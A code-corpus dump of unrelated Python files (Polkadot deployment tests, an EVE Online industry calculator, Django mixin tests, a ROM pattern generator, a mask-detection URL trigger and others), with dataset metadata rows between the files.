tackle(overwrite_inputs=get_deployment_action(fixture, 'apply'), no_input=True)
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
except Exception:
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
raise Exception("Did not apply properly.")
def test_api_aws_k8s(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'api-aws-k8s.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-4"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
assert plan
try:
tackle(overwrite_inputs=get_deployment_action(fixture, 'apply'), no_input=True)
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
except Exception:
tackle(overwrite_inputs=get_deployment_action(fixture, 'destroy'), no_input=True)
raise Exception("Did not apply properly.")
def test_validator_aws_min(change_base_dir, fixture_dir, tmp_move_deployments):
fixture = os.path.join(fixture_dir, 'validator-aws-min.yaml')
create = tackle(overwrite_inputs=fixture, no_input=True)
assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-1"
plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
assert plan
# def test_validator_aws_network(change_base_dir, fixture_dir, tmp_move_deployments):
# fixture = os.path.join(fixture_dir, 'validator-aws-network.yaml')
# create = tackle(overwrite_inputs=fixture, no_input=True)
# assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-2"
# plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# assert plan
#
#
# def test_validator_aws_telemetry(change_base_dir, fixture_dir, tmp_move_deployments):
# fixture = os.path.join(fixture_dir, 'validator-aws-telemetry.yaml')
# create = tackle(overwrite_inputs=fixture, no_input=True)
# assert create['create_']['deployment_name'] == "polkadot-aws-prod-validator-3"
# plan = tackle(overwrite_inputs=get_deployment_action(fixture, 'plan'), no_input=True)
# assert plan
# def test_aws_network2(change_base_dir, fixture_dir):
# plan = tackle(overwrite_inputs=os.path.join(fixture_dir, 'aws-min-plan.yaml'), no_input=True)
# print("plan")
# assert plan
# =========================================================================== #
# terrascript/data/sdm.py (mjuenema/python-terrascript, BSD-2-Clause)
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:26 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.sdm
#
# instead of
#
# >>> import terrascript.data.strongdm.sdm
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.strongdm.sdm import *
# =========================================================================== #
# eveindustrytools/eveindustrytools.py (SustainedCruelty/eveindustrytools, MIT)
import pandas as pd
import evemarkettools as emt
import math
invTypes = emt.fuzz_static_dump()
materials = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityMaterials.csv.bz2')
quantities = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityProducts.csv.bz2')
# remove all of the test reaction formulas
quantities = pd.merge(quantities, invTypes.loc[invTypes['published'] == 1])[list(quantities.columns)]
probabilities = emt.fuzz_static_dump('https://www.fuzzwork.co.uk/dump/latest/industryActivityProbabilities.csv.bz2')
def input_materials(type_id: int, quantity: int, me: int = 0, prod_type: str = 'manufacturing', prices: bool = False) -> pd.DataFrame:
"""
Calculates the input materials needed for production (manufacturing or reaction). Uses a single production step
Args:
type_id: what item to produce
quantity: how much to produce
me: material efficiency of the blueprints
prod_type: what type of production ('reaction' or 'manufacturing')
prices: whether to calculate prices for the input materials (adds columns price)
Return:
returns a pandas dataframe with the columns 'type_id', 'type_name', 'quantity' ('price' if prices = True)
"""
actID = {'manufacturing': 1, 'reaction': 11}
mats = pd.DataFrame(columns=['type_id', 'type_name', 'quantity'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mats = mats.append({'type_id': row['materialTypeID'], 'type_name': emt.typeIDToName(row['materialTypeID']), 'quantity': quant}, ignore_index=True)
# buys the product instead of manufacturing more of it than needed
if int(runs * qPerRun) < int(quantity):
mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity - (runs * qPerRun)},ignore_index=True)
mats = mats.groupby(['type_id', 'type_name']).sum().reset_index()
mats = mats.astype({"type_id": int, "quantity": int})
if prices:
mats = emt.add_price(mats)
return mats
def vertical_production(type_id: int, quantity: int, me: int = 0, prod_type: str = 'manufacturing' , prices: bool = False) -> pd.DataFrame:
"""
Calculates the input materials needed for vertical manufacturing (producing as much as possible)
Args:
type_id: type_id of the item to produce
quantity: how much of the item to produce
me: material efficiency of the blueprints
prod_type: what type of production ('reaction' or 'manufacturing')
prices: whether to calculate the prices for the input materials (additional column 'price')
Returns:
returns a dataframe with the columns 'type_id', 'type_name', 'quantity', 'price' (if prices is set to true)
"""
actID = {'manufacturing': 1, 'reaction': 11}
mats = pd.DataFrame(columns=['type_id', 'type_name', 'quantity'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mats = mats.append(vertical_production(row['materialTypeID'], quant, prod_type = prod_type) ,ignore_index=True)
# buys the product instead of manufacturing more of it than needed
if int(runs * qPerRun) < int(quantity):
mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity - (runs * qPerRun)},ignore_index=True)
else: # item cannot be manufactured
mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity}, ignore_index=True)
mats = mats.groupby(['type_id', 'type_name']).sum().reset_index()
mats = mats.astype({"type_id": int, "quantity": int})
if prices:
mats = emt.add_price(mats)
return mats
def vertical_production_runs(type_id: int, quantity: int, me: int = 10, prod_type: str = 'manufacturing') -> pd.DataFrame:
"""
Calculates the blueprint/reaction runs needed for vertical manufacturing (producing as much as possible)
Args:
type_id: what item/ship to produce
quantity: how much of the item to produce
me: material efficiency of the blueprints
prod_type: what type of production ('manufacturing' or 'reaction')
Returns:
returns a dataframe with the columns 'type_id', 'type_name', 'runs'
"""
actID = {'manufacturing': 1, 'reaction': 11}
mat_runs = pd.DataFrame(columns=['type_id', 'type_name', 'runs'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
mat_runs = mat_runs.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'runs': runs}, ignore_index=True)
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mat_runs = mat_runs.append(
vertical_production_runs(row['materialTypeID'], quant, prod_type = prod_type))
return mat_runs.reset_index(drop=True)
def invention_probability(type_id: int, rem: int = 5, science1: int = 5, science2: int = 5,
decryptor: int = 1) -> float:
base = probabilities['probability'].loc[(probabilities['typeID'] == type_id)].iloc[0]
return base * (1 + ((rem / 40) + ((science1 + science2) / 30))) * decryptor
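`invention_probability` above is the standard invention-chance formula: a base probability scaled by the encryption skill (`rem`), the two science skills, and a decryptor modifier. A self-contained numeric sketch of the same arithmetic; the 0.30 base value is illustrative only, real base chances come from the `probabilities` table:

```python
def invention_chance(base, rem=5, science1=5, science2=5, decryptor=1.0):
    # base * (1 + rem/40 + (science1 + science2)/30) * decryptor_modifier
    return base * (1 + ((rem / 40) + ((science1 + science2) / 30))) * decryptor

# All relevant skills at 5 and no decryptor: a 30% base chance becomes 43.75%
print(round(invention_chance(0.30), 4))  # 0.4375
```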
def me_formula(quantity: int, me: int = 0) -> int:
return max(1, math.ceil(round((quantity * ((100 - me) / 100)), 2)))
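`me_formula` implements blueprint material-efficiency rounding: reduce the base quantity by `me` percent, round to two decimals, take the ceiling, and never drop below one unit per run. A standalone copy to show the behavior at the edges:

```python
import math

def me_formula(quantity: int, me: int = 0) -> int:
    # Per-run material need after ME reduction; a run never consumes < 1 unit.
    return max(1, math.ceil(round(quantity * ((100 - me) / 100), 2)))

print(me_formula(100, 10))  # 90  (clean 10% reduction)
print(me_formula(333, 10))  # 300 (299.7 rounds up to a whole unit)
print(me_formula(1, 10))    # 1   (floor of one unit per run)
```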
def productToFormula(type_id: int) -> int:
if type_id not in quantities['productTypeID'].loc[quantities['activityID'] == 11].values:
raise ValueError(f"{type_id} is not a reaction")
return quantities['typeID'].loc[(quantities['productTypeID'] == type_id)].iloc[0]
def formulaToProduct(type_id: int) -> int:
if type_id not in quantities['typeID'].loc[quantities['activityID'] == 11].values:
raise ValueError(f"{type_id} is not a reaction formula")
return quantities['productTypeID'].loc[(quantities['typeID'] == type_id)].iloc[0]
def T2ItemToT1BPC(type_id: int) -> int:
if type_id not in quantities['productTypeID'].loc[quantities['activityID'] == 1].values:
raise ValueError(f"{type_id} doesnt have a corresponding t1 blueprint")
t2bpc = quantities['typeID'].loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].iloc[0]
return quantities['typeID'].loc[(quantities['activityID'] == 8) & (quantities['productTypeID'] == t2bpc)].iloc[0]
def bpToProduct(type_id: int) -> int:
if type_id not in quantities['typeID'].values:
raise ValueError(f"{type_id} is not a blueprint")
return quantities['productTypeID'].loc[(quantities['activityID'] == 1) & (quantities['typeID'] == type_id)].iloc[0]
def productToBP(type_id: int) -> int:
if type_id not in quantities.loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].values:
raise ValueError(f"{type_id} doesnt have a corresponding blueprint")
return quantities['typeID'].loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].iloc[0]
def quantPerRun(type_id: int) -> int:
if type_id not in quantities['typeID'].values:
raise ValueError(f"{type_id} is not a blueprint")
return quantities['quantity'].loc[(quantities['typeID'] == type_id)].iloc[0]
# =========================================================================== #
# skylink/__init__.py (enourbakhsh/SkyLink, MIT)
from .skylink import *
from .fof import *
from .astropy_search.matching import *
from .graph import *
from .testing import *
from .version import __version__
# =========================================================================== #
# components/mpas-seaice/testing_and_setup/testcases/error_analysis/run_testcase.py
# (Fa-Li/E3SM; zlib-acknowledgement/FTL/RSA-MD)
from create_grids import create_grids
from run_model import run_model
from error_analysis_strain import error_analysis_strain
create_grids()
run_model()
error_analysis_strain()
# =========================================================================== #
# adou/__init__.py (dpsnewailab/adou, MIT)
from adou.meta.model import *
# =========================================================================== #
# yaml_backed_structs/__init__.py (dcdanko/YamlBackedPyStructs, MIT)
from .persistent_dict import *
from .persistent_set import *
# =========================================================================== #
# app/views/index.py (godfoder/settler, MIT)
from .. import app
from flask import render_template
from flask.ext.security import login_required
@app.route('/')
@login_required
def index():
return render_template("index.html")
| 18.7 | 45 | 0.764706 | 26 | 187 | 5.346154 | 0.576923 | 0.129496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128342 | 187 | 9 | 46 | 20.777778 | 0.852761 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | true | 0 | 0.428571 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
3a69a1ee2c9e0c0f0ac674adcf1fdc0d20c94a3a | 1,712 | py | Python | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 4 | 2018-11-14T09:07:13.000Z | 2019-12-23T08:48:00.000Z | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 1 | 2019-12-08T07:58:40.000Z | 2019-12-08T11:50:54.000Z | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 1 | 2019-12-23T08:54:50.000Z | 2019-12-23T08:54:50.000Z | # 用python生成第四次数电实验的代码,采用奇校验
data = list(map(int, input("Enter the 16-bit binary value to convert, space-separated\n").split()))
if len(data) != 16:
print("Input must be 16 bits long!")
exit()
j = 0
cnt = 0
output = []
for i in range(15):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(15):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
for d in data:
if(d == 0):
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(6):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
else:
cnt += 1
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
for i in range(6):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
if cnt % 2 == 0:
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
while j < 220:
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
else:
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
while j < 220:
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
with open('rom.patt', 'w') as f:
f.writelines(output)
| 23.452055 | 62 | 0.439252 | 267 | 1,712 | 2.816479 | 0.179775 | 0.12766 | 0.143617 | 0.159574 | 0.75 | 0.75 | 0.75 | 0.75 | 0.75 | 0.730053 | 0 | 0.068182 | 0.331776 | 1,712 | 72 | 63 | 23.777778 | 0.589161 | 0.028037 | 0 | 0.765625 | 0 | 0 | 0.174096 | 0.013253 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.203125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a772a52c52d38232b282fde6dc910629442c560 | 160 | py | Python | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | 3 | 2021-04-21T03:56:53.000Z | 2021-04-23T07:24:11.000Z | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | null | null | null | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | null | null | null | from fastapi_model import FastModelTran
import sys
# TODO: command-line entry point reserved for future use
def parsing_parameters(parameters):
pass
def main():
parsing_parameters(sys.argv)
| 13.333333 | 39 | 0.76875 | 20 | 160 | 6 | 0.7 | 0.283333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16875 | 160 | 11 | 40 | 14.545455 | 0.902256 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0.333333 | false | 0.166667 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
3add64fa27ffaa69e5d72db676dd34efe9cc952a | 23 | py | Python | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | 4 | 2020-03-26T18:05:10.000Z | 2021-12-02T03:08:56.000Z | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | null | null | null | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | 1 | 2021-08-30T20:28:25.000Z | 2021-08-30T20:28:25.000Z | from .httools import *
| 11.5 | 22 | 0.73913 | 3 | 23 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aaff1a0aeb306873788a7dc89520ab99e015d5b6 | 65 | py | Python | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | 1 | 2018-12-08T07:07:37.000Z | 2018-12-08T07:07:37.000Z | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | null | null | null | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | null | null | null | from .cloudinary import drivers
from .cloudinary import providers | 32.5 | 33 | 0.861538 | 8 | 65 | 7 | 0.625 | 0.5 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107692 | 65 | 2 | 33 | 32.5 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c961f5423a3a9d78db17a07344e23348be27e608 | 49 | py | Python | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | from plugnparse import entrypoint, ParserFactory
| 24.5 | 48 | 0.877551 | 5 | 49 | 8.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 1 | 49 | 49 | 0.977273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c9726399e9ebaf245ce8befadef59f10cdfeac1c | 7,928 | py | Python | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 2 | 2019-06-24T20:22:23.000Z | 2019-07-26T12:51:31.000Z | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 278 | 2018-02-21T11:49:46.000Z | 2021-09-16T08:27:54.000Z | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 3 | 2019-05-02T15:26:26.000Z | 2020-02-18T17:47:57.000Z | from unittest.mock import patch, Mock
from directory_constants.choices import COUNTRY_CHOICES
import pytest
from django.contrib.auth.models import AnonymousUser
from django.utils import translation
from django.views.generic import TemplateView
from directory_components import mixins
@pytest.mark.parametrize('country_code,country_name', COUNTRY_CHOICES)
@patch('directory_components.helpers.get_user_country')
def test_country_display_mixin(
mock_country, country_code, country_name, rf
):
class TestView(mixins.CountryDisplayMixin, TemplateView):
template_name = 'directory_components/base.html'
mock_country.return_value = country_code
request = rf.get('/')
response = TestView.as_view()(request)
assert response.context_data['hide_country_selector']
assert response.context_data['country']['name'] == country_name
assert response.context_data['country']['code'] == country_code.lower()
@patch('directory_components.helpers.get_user_country')
def test_country_display_mixin_no_country(mock_country, rf):
class TestView(mixins.CountryDisplayMixin, TemplateView):
template_name = 'directory_components/base.html'
mock_country.return_value = ''
request = rf.get('/')
response = TestView.as_view()(request)
assert not response.context_data['hide_country_selector']
assert not response.context_data['country']['name']
assert not response.context_data['country']['code']
def test_language_display_mixin(rf, settings):
class TestView(mixins.EnableTranslationsMixin, TemplateView):
template_name = 'directory_components/base.html'
# Test with usual settings first
request = rf.get('/')
request.LANGUAGE_CODE = ''
response = TestView.as_view()(request)
assert response.context_data['language_switcher']['form']
# Test when MIDDLWARE_CLASSES setting is being used instead of MIDDLEWARE
settings.MIDDLEWARE_CLASSES = settings.MIDDLEWARE
settings.MIDDLEWARE = []
request = rf.get('/')
request.LANGUAGE_CODE = ''
response = TestView.as_view()(request)
assert response.context_data['language_switcher']['form']
def test_cms_language_switcher_one_language(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {'languages': [('en-gb', 'English')]}
}
request = rf.get('/')
request.LANGUAGE_CODE = ''
with translation.override('de'):
response = MyView.as_view()(request)
assert response.status_code == 200
assert response.context_data['language_switcher']['show'] is False
def test_cms_language_switcher_active_language_unavailable(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {
'languages': [('en-gb', 'English'), ('de', 'German')]
}
}
request = rf.get('/')
request.LANGUAGE_CODE = 'fr'
response = MyView.as_view()(request)
assert response.status_code == 200
assert response.context_data['language_switcher']['show'] is False
def test_cms_language_switcher_active_language_available(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {
'languages': [('en-gb', 'English'), ('de', 'German')]
}
}
request = rf.get('/')
request.LANGUAGE_CODE = 'de'
response = MyView.as_view()(request)
assert response.status_code == 200
context = response.context_data['language_switcher']
assert context['show'] is True
assert context['form'].initial['lang'] == 'de'
def test_ga360_mixin_for_logged_in_user_old_style(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.sso_user = Mock(
hashed_uuid='a9a8f733-6bbb-4dca-a682-e8a0a18439e9',
spec_set=['hashed_uuid'],
)
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['page_id'] == 'TestPageId'
assert ga360_data['business_unit'] == 'Test App'
assert ga360_data['site_section'] == 'Test Section'
assert ga360_data['site_subsection'] == 'Test Page'
assert ga360_data['user_id'] == 'a9a8f733-6bbb-4dca-a682-e8a0a18439e9'
assert ga360_data['login_status'] is True
assert ga360_data['site_language'] == 'de'
def test_ga360_mixin_for_logged_in_user(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.user = Mock(
id=1,
hashed_uuid='a9a8f733-6bbb-4dca-a682-e8a0a18439e9',
is_authenticated=True
)
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['page_id'] == 'TestPageId'
assert ga360_data['business_unit'] == 'Test App'
assert ga360_data['site_section'] == 'Test Section'
assert ga360_data['site_subsection'] == 'Test Page'
assert ga360_data['user_id'] == 'a9a8f733-6bbb-4dca-a682-e8a0a18439e9'
assert ga360_data['login_status'] is True
assert ga360_data['site_language'] == 'de'
def test_ga360_mixin_for_anonymous_user_old_style(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.sso_user = None
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['user_id'] is None
assert ga360_data['login_status'] is False
def test_ga360_mixin_for_anonymous_user(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.user = AnonymousUser()
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['user_id'] is None
assert ga360_data['login_status'] is False
def test_ga360_mixin_does_not_share_data_between_instances():
class TestView(mixins.GA360Mixin):
pass
view_one = TestView()
view_one.ga360_payload['Test Key'] = "Test Value"
view_two = TestView()
assert 'Test Key' not in view_two.ga360_payload
| 31.212598 | 77 | 0.6694 | 897 | 7,928 | 5.623188 | 0.152731 | 0.039255 | 0.07157 | 0.041435 | 0.813243 | 0.781324 | 0.76249 | 0.717883 | 0.717883 | 0.687946 | 0 | 0.035364 | 0.215313 | 7,928 | 253 | 78 | 31.335968 | 0.775438 | 0.012866 | 0 | 0.661202 | 0 | 0 | 0.177298 | 0.076825 | 0 | 0 | 0 | 0 | 0.20765 | 1 | 0.081967 | false | 0.005464 | 0.038251 | 0 | 0.251366 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a30bff55e8de2d484dc740f7cf8472d7fc4b22a5 | 165 | py | Python | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | 1 | 2021-08-04T06:15:45.000Z | 2021-08-04T06:15:45.000Z | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | null | null | null | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | null | null | null | import urllib.request
if mask_detected:
urllib.request.urlopen('http://192.168.43.136/mask')
else:
urllib.request.urlopen('http://192.168.43.136/nomask')
